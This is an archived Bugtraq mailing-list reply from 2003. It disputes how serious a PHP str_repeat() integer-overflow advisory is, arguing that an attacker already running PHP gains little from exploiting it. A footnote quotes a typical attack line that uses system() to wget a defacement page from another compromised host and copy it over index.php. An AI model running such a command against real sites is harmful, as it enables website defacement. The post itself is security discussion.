[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20030403083903.A20875@cookie.hinet.hr>
Date: Thu, 3 Apr 2003 08:39:03 +0200
From: Goran Krajnovic <goran.krajnovic@...et.hr>
To: bugtraq@...urityfocus.com
Subject: Re: @(#)Mordred Labs advisory - Integer overflow in PHP str_repeat() function
On 2003.04.01 14:29 Sir Mordred wrote:
> The implementation of this function suffers from a simple integer overflow
> caused by
> a very long second argument and could allow a local/remote attacker in the
> worst case to gain control over the web server.
This is a bit pointless, IMHO. 99% of PHP installations run the PHP code with
the user-id of the web server process (usually a low privilege user like
'nobody' or 'apache'). Exploiting one (of many) bugs in PHP to 'gain control
over the web server' is like getting a remote shell on a machine and then
running a buffer overflow exploit in order just to be able to run commands
instead of typing them into the shell directly.
If an attacker has the opportunity to execude PHP code of his choice on a
target server [1], he does not need to exploit a buffer overflow in PHP just to
get the privileges of the web server user - he already runs code with the
privileges of that user. And having the ability to run PHP code gives him just
about the same level of power as getting a non-root shell on the box.
Searching on http://bugs.php.net will give you a lot more ways to crash PHP,
and probably a number of these can be used to get a buffer overflow, but I
don't think that reporting each of them here will solve anything. Report them
to http://bugs.php.net.
[1] Usually by exploiting some of the poor programming practices in some PHP
applications, misconfigurations, or bugs. See
http://www.securityfocus.com/bid/3889 for example. In a typical attack, this is
used to execute code, and the code is usually system('wget
http://another.exploited.host/defaced-index.php'); system('cp defaced-index.php
index.php') or similar.
--
Goran Krajnović, dipl. ing.
[ Goran.Krajnovic@...et.hr ]
Hrvatski Telekom - HThinet
Powered by blists - more mailing lists